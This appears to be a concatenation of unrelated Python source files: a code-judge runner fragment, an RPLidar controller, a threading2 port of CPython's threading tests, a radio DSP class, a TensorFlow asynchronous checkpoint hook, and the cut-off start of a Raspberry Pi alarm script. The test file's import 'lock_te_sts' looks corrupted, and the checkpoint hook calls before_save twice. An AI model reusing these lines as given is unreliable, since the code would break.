if os.system("cd /source && java code < /source/in{0}.txt > /source/out/out{0}.txt 2> /source/out/err{0}.txt".format(i)) != 0:
result = "runtime_error"
with open("/source/out/result{0}.txt".format(i), "w") as f:
f.write(result)
print("ok")
timeout.cancel()
exit(0)
timeout = Timer(timeLimit, kill)
timeout.start()
thread = Thread(target=runCode, args=(timeout,), daemon=True)
thread.start()
|
lidar.py
|
from rplidar import RPLidar
import time
from multiprocessing import Pipe
from threading import Thread, Event
class LidarController(object):
"""
Asynchronous controller for the rplidar.
"""
def __init__(self, port='/dev/ttyUSB0'):
self.lidar = RPLidar(port)
print('LidarController:', self.lidar.get_info())
print('LidarController:', self.lidar.get_health())
time.sleep(1)
self._start_reading_data()
def _create_background_reader(self, pipeout, stopsig):
print('LidarController: background thread started.')
for scan in self.lidar.iter_scans():
if stopsig.is_set():
print('LidarController: background thread finished.')
return
_, angles, dists = zip(*scan)
pipeout.send((angles, dists))
def _start_reading_data(self):
self.pipein, pipeout = Pipe()
self.stopsig = Event()
Thread(target=self._create_background_reader, args=(pipeout, self.stopsig)).start()
def stop(self):
self.lidar.stop_motor()
self.stopsig.set()
def scan(self):
"""
Read the latest rplidar scan. If now new scan if available, this function will block the calling thread until a
scan is available.
:param timeout If timeout is not specified then it will return immediately.
If timeout is a number then this specifies the maximum time in seconds to block.
If timeout is None then an infinite timeout is used
:return: latest scan - (list of angles, list of distances)
"""
scan = None, None
is_first = True
while self.pipein.poll() or is_first:
scan = self.pipein.recv()
is_first = False
return scan
if __name__ == '__main__':
lidar = LidarController()
scan_num = 0
for i in range(3):
angles, dists = lidar.scan()
time.sleep(1)
print(angles, dists)
lidar.stop()
|
test_threading.py
|
###
### This is a verbatim copy of the "test_threading" regression tests from
### the standard Python distribution (svn revision 77924 to be precise) with
### some simple changes to make it run using threading2:
###
### * "import threading" => "import threading2 as threading"
### * "from test import lock_tests" => "from stdregr import lock_tests"
### * "self.assertIn(a,b)" => "self.assertTrue(a in b)"
### * "self.assertNotIn(a,b)" => "self.assertFalse(a in b)"
### * "self.assertIsInstance(a,b)" => "self.assertTrue(isinstance(a,b))"
### * disabled main_test so it's not detected by nose, py.test, etc.
### * disabled test_join_nondaemon_on_shutdown; it fails on old pythons
###
###
### If you want to get technical, the copyright for this file is thus:
###
### Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010
### Python Software Foundation; All Rights Reserved
###
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
import threading2 as threading
import thread
import time
import unittest
import weakref
from threading2.tests.stdregr import lock_te_sts as lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertTrue(tid in threading._active)
self.assertTrue(isinstance(threading._active[tid],threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""])
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0, "Unexpected error")
# def test_join_nondaemon_on_shutdown(self):
# # Issue 1722344
# # Raising SystemExit skipped threading._shutdown
# import subprocess
# p = subprocess.Popen([sys.executable, "-c", """if 1:
# import threading
# from time import sleep
#
# def child():
# sleep(1)
# # As a non-daemon thread we SHOULD wake up and nothing
# # should be torn down yet
# print "Woke up, sleep function is:", sleep
#
# threading.Thread(target=child).start()
# raise SystemExit
# """],
# stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout, stderr = p.communicate()
# self.assertEqual(stdout.strip(),
# "Woke up, sleep function is: <built-in function sleep>")
# stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
# self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
' due to known OS bugs on'), sys.platform
return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
#def test_main():
# test.test_support.run_unittest(LockTests, RLockTests, EventTests,
# ConditionAsRLockTests, ConditionTests,
# SemaphoreTests, BoundedSemaphoreTests,
# ThreadTests,
# ThreadJoinOnShutdown,
# ThreadingExceptionTests,
# )
#
#if __name__ == "__main__":
# test_main()
|
__init__.py
|
#f2_dsp class
# Last modification by Marko Kosunen, marko.kosunen@aalto.fi, 14.11.2018 11:44
import numpy as np
import scipy.signal as sig
import tempfile
import subprocess
import shlex
import time
from thesdk import *
from f2_util_classes import *
from f2_decimator import *
import signal_generator_802_11n as sg80211n
class f2_rx_dsp(verilog,thesdk):
@property
def _classfile(self):
return os.path.dirname(os.path.realpath(__file__)) + "/"+__name__
def __init__(self,*arg):
self.proplist = [ 'Rs',
'Rs_dsp',
'Rxantennas',
'Users',
'dsp_decimator_scales', # Scales for the rx decimator chain
'dsp_decimator_cic3shift', # Left-shift for the decimator cic integrator
'rx_output_mode'
];
self.Rs = 160e6; # sampling frequency
self.Rs_dsp=20e6
#These are fixed
self.Rxantennas=4
self.Users=4
self.Rxindex=0
self.Userindex=0
self.iptr_A = IO()
self.model='py'; #can be set externally, but is not propagated
self.dsp_decimator_model='py' #Used only for python model byt can be set for testing
self.dsp_decimator_scales=[1,1,1,1]
self.dsp_decimator_cic3shift=0
self.rtldiscard=50
self.rx_output_mode=1
#self.dspmode='local'; # [ 'local' | 'cpu' ]
self.par= False #by default, no parallel processing
self.queue= [] #by default, no parallel processing
self.DEBUG= False
if len(arg)>=1:
parent=arg[0]
self.copy_propval(parent,self.proplist)
self.parent =parent;
#What is outputted to these 4 ports is selected with modes
self.iptr_A.Data=[IO() for _ in range(self.Rxantennas)]
self._io_ofifo=iofifosigs(**{'users':self.Users})
self.preserve_iofiles='False'
self.init()
def init(self):
self.def_verilog()
#Add decimator
self.decimator=[ f2_decimator() for i in range(self.Rxantennas)]
for i in range(self.Rxantennas):
self.decimator[i].Rs_high=self.Rs
self.decimator[i].Rs_low=self.Rs_dsp
self.decimator[i].model=self.dsp_decimator_model
self.decimator[i].iptr_A=self.iptr_A.Data[i]
self.decimator[i].scales=self.dsp_decimator_scales
self.decimator[i].cic3shift=self.dsp_decimator_cic3shift
self.decimator[i].init()
self.mode=self.decimator[0].mode
self._vlogmodulefiles =list(['clkdiv_n_2_4_8.v' ,'AsyncResetReg.v'])
self._vlogparameters=dict([ ('g_Rs_high',self.Rs), ('g_Rs_low',self.Rs_dsp),
('g_scale0',self.dsp_decimator_scales[0]),
('g_scale1',self.dsp_decimator_scales[1]),
('g_scale2',self.dsp_decimator_scales[2]),
('g_scale3',self.dsp_decimator_scales[3]),
('g_cic3shift', self.dsp_decimator_cic3shift),
('g_mode',self.mode),
('g_user_index', 0),
('g_antenna_index', 0),
('g_rx_output_mode', self.rx_output_mode),
('g_input_mode', 0),
('g_adc_fifo_lut_mode' ,2)
])
def run(self,*arg):
if len(arg)>0:
self.par=True #flag for parallel processing
self.queue=arg[0] #multiprocessing.queue as the first argument
if self.model=='py':
self.process_input()
else:
self.write_infile()
self.run_verilog()
self.read_outfile()
def process_input(self):
#Could use parallel forloop here
[ self.decimator[i].run() for i in range(self.Rxantennas) ]
#Run decimatiors in parallel
#Split in two phases: First, get the channel estimates
# l=0
# que=[]
# proc=[]
# for i in range(self.Rxantennas):
# self.decimator[i].init()
# que.append(multiprocessing.Queue())
# proc.append(multiprocessing.Process(target=self.decimator[i].run, args=(que[l],)))
# proc[l].start()
# l += 1
#
# #Collect results for dsps
# l=0
# for i in range(self.Rxantennas):
# for k in range(self.Users):
# self._decimated.Data[k].Data=que[l].get()
# proc2[l].join()
# l+=1
#Each of the RX's provide self.Users datastreams
####################
### At this point we should add the beamforming and the demodulation
### BUT CURRENTLY WE DO NOT:
####################
self.print_log(type='W', msg='Discarded %i zero samples to remove possibble initial transients in symbol sync.' %(self.rtldiscard))
#Array (antennas,time,users) of decimated datsrteams
decimated= [ self.decimator[i]._Z.Data.reshape(-1,1)[self.rtldiscard::,0].reshape(-1,1)@np.ones((1,self.Users)) for i in range(self.Rxantennas)]
sumuserstream=np.sum(decimated,0)
seluser=[ decimated[i][:,self.Userindex].reshape(-1,1) for i in range(self.Rxantennas)]
selrx=[ decimated[self.Rxindex][:,i].reshape(-1,1) for i in range(self.Users)]
selrxuser=decimated[self.Rxindex][:,self.Userindex].reshape(-1,1)
if (self.rx_output_mode==0):
self.print_log(type='I', msg="Applying RX ouput mode %s - Bypass" %(self.rx_output_mode) )
#Bypass the sampling rate is NOT reduced
for k in range(self.Rxantennas):
self._io_ofifo.data[k].udata.Data=self.iptr_A.Data[k].Data.reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==1):
self.print_log(type='I', msg="Applying RX ouput mode %s - User %s selected from all RX's" %(self.rx_output_mode, self.Userindex) )
for k in range(self.Rxantennas):
self._io_ofifo.data[k].udata.Data=seluser[k].reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=self.Userindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==2):
self.print_log(type='I', msg="Applying RX ouput mode %s - RX %s selected for all users's" %(self.rx_output_mode, self.Rxindex) )
for k in range(self.Users):
self._io_ofifo.data[k].udata.Data=selrx[k].reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.data[k].rxindex.Data=self.Rxindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==3):
self.print_log(type='I', msg="Applying RX ouput mode %s - RX %s and user %s selected to ouput index 0" %(self.rx_output_mode, self.Rxindex, self.Userindex) )
for k in range(self.Users):
if k==0:
self._io_ofifo.data[k].udata.Data=selrxuser.reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=self.Userindex
self._io_ofifo.rxindex.Data=self.Rxindex
else:
self._io_ofifo.data[k].udata.Data=np.zeros_like(selrxuser.reshape(-1,1))
self._io_ofifo.data[k].uindex.Data=self.Userindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=self.Rxindex*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
elif (self.rx_output_mode==4):
self.print_log(type='F', msg="RX ouput mode %s - User data streaming in serial manner is no longer supported " %(self.rx_output_mode) )
elif (self.rx_output_mode==5):
self.print_log(type='F', msg="RX ouput mode %s - User data is streamed out in time-interleaved indexed order from four DSP outputs is no longer supported" %(self.rx_output_mode) )
elif (self.rx_output_mode==6):
self.print_log(type='I', msg="Applying RX ouput mode %s - Summed data is streamed out. Output position index is user index" %(self.rx_output_mode) )
for k in range(self.Users):
self._io_ofifo.data[k].udata.Data=sumuserstream[:,k].reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
else:
#Bypass
self.print_log(type='I', msg="Applying RX ouput mode %s - Bypass" %(self.rx_output_mode) )
for k in range(self.Rxantennas):
self._io_ofifo.data[k].udata.Data=self.iptr_A.Data[k].Data.reshape(-1,1)
self._io_ofifo.data[k].uindex.Data=k*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
self._io_ofifo.rxindex.Data=0*np.ones_like(self._io_ofifo.data[k].udata.Data[0].shape[0])
def distribute_result(self,result):
for k in range(self.Users):
if self.par:
self.queue.put(result[:,k].reshape(-1,1))
self._io_ofifo.data[k].udata.Data=result[:,k].reshape((-1,1))
def write_infile(self):
rndpart=os.path.basename(tempfile.mkstemp()[1])
if self.model=='sv':
self._infile=self._vlogsimpath +'/A_' + rndpart +'.txt'
self._outfile=self._vlogsimpath +'/Z_' + rndpart +'.txt'
elif self.model=='vhdl':
pass
else:
pass
try:
os.remove(self._infile)
except:
pass
for i in range(self.Users):
if i==0:
indata=self.iptr_A.Data[i].Data.reshape(-1,1)
else:
indata=np.r_['1',indata,self.iptr_A.Data[i].Data.reshape(-1,1)]
fid=open(self._infile,'wb')
np.savetxt(fid,indata.view(float),fmt='%i', delimiter='\t')
fid.close()
def read_outfile(self):
fid=open(self._outfile,'r')
fromfile = np.loadtxt(fid,dtype=complex,delimiter='\t')
#Of course it does not work symmetrically with savetxt
for i in range(self.Users):
if i==0:
out=np.zeros((fromfile.shape[0],int(fromfile.shape[1]/2)),dtype=complex)
out[:,i]=(fromfile[:,2*i]+1j*fromfile[:,2*i+1])
else:
out[:,i]=(fromfile[:,2*i]+1j*fromfile[:,2*i+1])
maximum=np.amax([np.abs(np.real(out[:,i])), np.abs(np.imag(out[:,i]))])
str="Output signal range is %i" %(maximum)
self.print_log(type='I', msg=str)
fid.close()
#os.remove(self._outfile)
#Copy the value to multiple outputs for users
self.distribute_result(out)
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
# We do write graph and saver_def at the first call of before_run.
# We cannot do this in begin, since we let other hooks to change graph and
# add variables in begin. Graph is finalized after all begin calls.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn)
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
# Save the last checkpoint synchronously if needed.
if last_step != self._timer.last_triggered_step():
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
# Skip saving on step 0
if step == 0:
return
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
for l in self._listeners:
l.before_save(session, step)
if not asynchronous:
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
|
run1.py
|
import datetime
import threading
import time
import paho.mqtt.publish as publish
import requests
from flask import Flask
from grove.gpio import GPIO
from grove.grove_ultrasonic_ranger import GroveUltrasonicRanger
import logging
# Connect the GroveUltrasonicRanger to D5 & D16
ultrasonic_ranger_1 = GroveUltrasonicRanger(5)
ultrasonic_ranger_2 = GroveUltrasonicRanger(16)
# Connect the buzzer to digital port 6
buzzer = GPIO(6, GPIO.OUT)
# Connect led to digital port 17
led = GPIO(17, GPIO.OUT)
app = Flask(__name__)
# variable states
alarmActive = False
buzzerActive = 0
testColor = 0
last_ultrasonic_ranger_1 = False
last_ultrasonic_ranger_2 = False
trigger_distance = 120
time_a = datetime.time(22, 0)
time_b = datetime.time(5, 00)
delay = 0.1
def is_bad_time():
